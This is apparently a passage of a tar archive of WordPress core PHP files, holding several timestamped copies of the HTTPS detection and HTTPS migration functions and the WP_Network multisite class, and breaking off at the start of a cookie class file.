function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605104304-20260621081211.php 0000666 00000011205 15224151220 0013336 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605070331-20260621081104-20260621181046.php 0000666 00000013341 15224151220 0014715 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605080432.php 0000666 00000013341 15224151220 0011756 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260614061720-20260621212901.php 0000666 00000011205 15224151220 0013344 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-network.php 0000666 00000030010 15224151220 0010465 0 ustar 00 <?php
/**
* Network API: WP_Network class
*
* @package WordPress
* @subpackage Multisite
* @since 4.4.0
*/
/**
* Core class used for interacting with a multisite network.
*
* This class is used during load to populate the `$current_site` global and
* setup the current network.
*
* This class is most useful in WordPress multi-network installations where the
* ability to interact with any network of sites is required.
*
* @since 4.4.0
*
* @property int $id
* @property int $site_id
*/
#[AllowDynamicProperties]
class WP_Network {
/**
* Network ID.
*
* @since 4.4.0
* @since 4.6.0 Converted from public to private to explicitly enable more intuitive
* access via magic methods. As part of the access change, the type was
* also changed from `string` to `int`.
* @var int
*/
private $id;
/**
* Domain of the network.
*
* @since 4.4.0
* @var string
*/
public $domain = '';
/**
* Path of the network.
*
* @since 4.4.0
* @var string
*/
public $path = '';
/**
* The ID of the network's main site.
*
* Named "blog" vs. "site" for legacy reasons. A main site is mapped to
* the network when the network is created.
*
* A numeric string, for compatibility reasons.
*
* @since 4.4.0
* @var string
*/
private $blog_id = '0';
/**
* Domain used to set cookies for this network.
*
* @since 4.4.0
* @var string
*/
public $cookie_domain = '';
/**
* Name of this network.
*
* Named "site" vs. "network" for legacy reasons.
*
* @since 4.4.0
* @var string
*/
public $site_name = '';
/**
* Retrieves a network from the database by its ID.
*
* @since 4.4.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param int $network_id The ID of the network to retrieve.
* @return WP_Network|false The network's object if found. False if not.
*/
public static function get_instance( $network_id ) {
global $wpdb;
$network_id = (int) $network_id;
if ( ! $network_id ) {
return false;
}
$_network = wp_cache_get( $network_id, 'networks' );
if ( false === $_network ) {
$_network = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM {$wpdb->site} WHERE id = %d LIMIT 1", $network_id ) );
if ( empty( $_network ) || is_wp_error( $_network ) ) {
$_network = -1;
}
wp_cache_add( $network_id, $_network, 'networks' );
}
if ( is_numeric( $_network ) ) {
return false;
}
return new WP_Network( $_network );
}
/**
* Creates a new WP_Network object.
*
* Will populate object properties from the object provided and assign other
* default properties based on that information.
*
* @since 4.4.0
*
* @param WP_Network|object $network A network object.
*/
public function __construct( $network ) {
foreach ( get_object_vars( $network ) as $key => $value ) {
$this->__set( $key, $value );
}
$this->_set_site_name();
$this->_set_cookie_domain();
}
/**
* Getter.
*
* Allows current multisite naming conventions when getting properties.
*
* @since 4.6.0
*
* @param string $key Property to get.
* @return mixed Value of the property. Null if not available.
*/
public function __get( $key ) {
switch ( $key ) {
case 'id':
return (int) $this->id;
case 'blog_id':
return (string) $this->get_main_site_id();
case 'site_id':
return $this->get_main_site_id();
}
return null;
}
/**
* Isset-er.
*
* Allows current multisite naming conventions when checking for properties.
*
* @since 4.6.0
*
* @param string $key Property to check if set.
* @return bool Whether the property is set.
*/
public function __isset( $key ) {
switch ( $key ) {
case 'id':
case 'blog_id':
case 'site_id':
return true;
}
return false;
}
/**
* Setter.
*
* Allows current multisite naming conventions while setting properties.
*
* @since 4.6.0
*
* @param string $key Property to set.
* @param mixed $value Value to assign to the property.
*/
public function __set( $key, $value ) {
switch ( $key ) {
case 'id':
$this->id = (int) $value;
break;
case 'blog_id':
case 'site_id':
$this->blog_id = (string) $value;
break;
default:
$this->$key = $value;
}
}
/**
* Returns the main site ID for the network.
*
* Internal method used by the magic getter for the 'blog_id' and 'site_id'
* properties.
*
* @since 4.9.0
*
* @return int The ID of the main site.
*/
private function get_main_site_id() {
/**
* Filters the main site ID.
*
* Returning a positive integer will effectively short-circuit the function.
*
* @since 4.9.0
*
* @param int|null $main_site_id If a positive integer is returned, it is interpreted as the main site ID.
* @param WP_Network $network The network object for which the main site was detected.
*/
$main_site_id = (int) apply_filters( 'pre_get_main_site_id', null, $this );
if ( 0 < $main_site_id ) {
return $main_site_id;
}
if ( 0 < (int) $this->blog_id ) {
return (int) $this->blog_id;
}
if ( ( defined( 'DOMAIN_CURRENT_SITE' ) && defined( 'PATH_CURRENT_SITE' )
&& DOMAIN_CURRENT_SITE === $this->domain && PATH_CURRENT_SITE === $this->path )
|| ( defined( 'SITE_ID_CURRENT_SITE' ) && (int) SITE_ID_CURRENT_SITE === $this->id )
) {
if ( defined( 'BLOG_ID_CURRENT_SITE' ) ) {
$this->blog_id = (string) BLOG_ID_CURRENT_SITE;
return (int) $this->blog_id;
}
if ( defined( 'BLOGID_CURRENT_SITE' ) ) { // Deprecated.
$this->blog_id = (string) BLOGID_CURRENT_SITE;
return (int) $this->blog_id;
}
}
$site = get_site();
if ( $site->domain === $this->domain && $site->path === $this->path ) {
$main_site_id = (int) $site->id;
} else {
$main_site_id = get_network_option( $this->id, 'main_site' );
if ( false === $main_site_id ) {
$_sites = get_sites(
array(
'fields' => 'ids',
'number' => 1,
'domain' => $this->domain,
'path' => $this->path,
'network_id' => $this->id,
)
);
$main_site_id = ! empty( $_sites ) ? array_shift( $_sites ) : 0;
update_network_option( $this->id, 'main_site', $main_site_id );
}
}
$this->blog_id = (string) $main_site_id;
return (int) $this->blog_id;
}
/**
* Sets the site name assigned to the network if one has not been populated.
*
* @since 4.4.0
*/
private function _set_site_name() {
if ( ! empty( $this->site_name ) ) {
return;
}
$default = ucfirst( $this->domain );
$this->site_name = get_network_option( $this->id, 'site_name', $default );
}
/**
* Sets the cookie domain based on the network domain if one has
* not been populated.
*
* @todo What if the domain of the network doesn't match the current site?
*
* @since 4.4.0
*/
private function _set_cookie_domain() {
if ( ! empty( $this->cookie_domain ) ) {
return;
}
$domain = parse_url( $this->domain, PHP_URL_HOST );
$this->cookie_domain = is_string( $domain ) ? $domain : $this->domain;
if ( str_starts_with( $this->cookie_domain, 'www.' ) ) {
$this->cookie_domain = substr( $this->cookie_domain, 4 );
}
}
/**
* Retrieves the closest matching network for a domain and path.
*
* This will not necessarily return an exact match for a domain and path. Instead, it
* breaks the domain and path into pieces that are then used to match the closest
* possibility from a query.
*
* The intent of this method is to match a network during bootstrap for a
* requested site address.
*
* @since 4.4.0
*
* @param string $domain Domain to check.
* @param string $path Path to check.
* @param int|null $segments Path segments to use. Defaults to null, or the full path.
* @return WP_Network|false Network object if successful. False when no network is found.
*/
public static function get_by_path( $domain = '', $path = '', $segments = null ) {
$domains = array( $domain );
$pieces = explode( '.', $domain );
/*
* It's possible one domain to search is 'com', but it might as well
* be 'localhost' or some other locally mapped domain.
*/
while ( array_shift( $pieces ) ) {
if ( ! empty( $pieces ) ) {
$domains[] = implode( '.', $pieces );
}
}
/*
* If we've gotten to this function during normal execution, there is
* more than one network installed. At this point, who knows how many
* we have. Attempt to optimize for the situation where networks are
* only domains, thus meaning paths never need to be considered.
*
* This is a very basic optimization; anything further could have
* drawbacks depending on the setup, so this is best done per-installation.
*/
$using_paths = true;
if ( wp_using_ext_object_cache() ) {
$using_paths = get_networks(
array(
'number' => 1,
'count' => true,
'path__not_in' => '/',
)
);
}
$paths = array();
if ( $using_paths ) {
$path_segments = array_filter( explode( '/', trim( $path, '/' ) ) );
/**
* Filters the number of path segments to consider when searching for a site.
*
* @since 3.9.0
*
* @param int|null $segments The number of path segments to consider. WordPress by default looks at
* one path segment. The function default of null only makes sense when you
* know the requested path should match a network.
* @param string $domain The requested domain.
* @param string $path The requested path, in full.
*/
$segments = apply_filters( 'network_by_path_segments_count', $segments, $domain, $path );
if ( ( null !== $segments ) && count( $path_segments ) > $segments ) {
$path_segments = array_slice( $path_segments, 0, $segments );
}
while ( count( $path_segments ) ) {
$paths[] = '/' . implode( '/', $path_segments ) . '/';
array_pop( $path_segments );
}
$paths[] = '/';
}
/**
* Determines a network by its domain and path.
*
* This allows one to short-circuit the default logic, perhaps by
* replacing it with a routine that is more optimal for your setup.
*
* Return null to avoid the short-circuit. Return false if no network
* can be found at the requested domain and path. Otherwise, return
* an object from wp_get_network().
*
* @since 3.9.0
*
* @param null|false|WP_Network $network Network value to return by path. Default null
* to continue retrieving the network.
* @param string $domain The requested domain.
* @param string $path The requested path, in full.
* @param int|null $segments The suggested number of paths to consult.
* Default null, meaning the entire path was to be consulted.
* @param string[] $paths Array of paths to search for, based on `$path` and `$segments`.
*/
$pre = apply_filters( 'pre_get_network_by_path', null, $domain, $path, $segments, $paths );
if ( null !== $pre ) {
return $pre;
}
if ( ! $using_paths ) {
$networks = get_networks(
array(
'number' => 1,
'orderby' => array(
'domain_length' => 'DESC',
),
'domain__in' => $domains,
)
);
if ( ! empty( $networks ) ) {
return array_shift( $networks );
}
return false;
}
$networks = get_networks(
array(
'orderby' => array(
'domain_length' => 'DESC',
'path_length' => 'DESC',
),
'domain__in' => $domains,
'path__in' => $paths,
)
);
/*
* Domains are sorted by length of domain, then by length of path.
* The domain must match for the path to be considered. Otherwise,
* a network with the path of / will suffice.
*/
$found = false;
foreach ( $networks as $network ) {
if ( ( $network->domain === $domain ) || ( "www.{$network->domain}" === $domain ) ) {
if ( in_array( $network->path, $paths, true ) ) {
$found = true;
break;
}
}
if ( '/' === $network->path ) {
$found = true;
break;
}
}
if ( true === $found ) {
return $network;
}
return false;
}
}
class-wp-http-cookie-20260621094000.php 0000666 00000016335 15224151220 0012615 0 ustar 00 <?php
/**
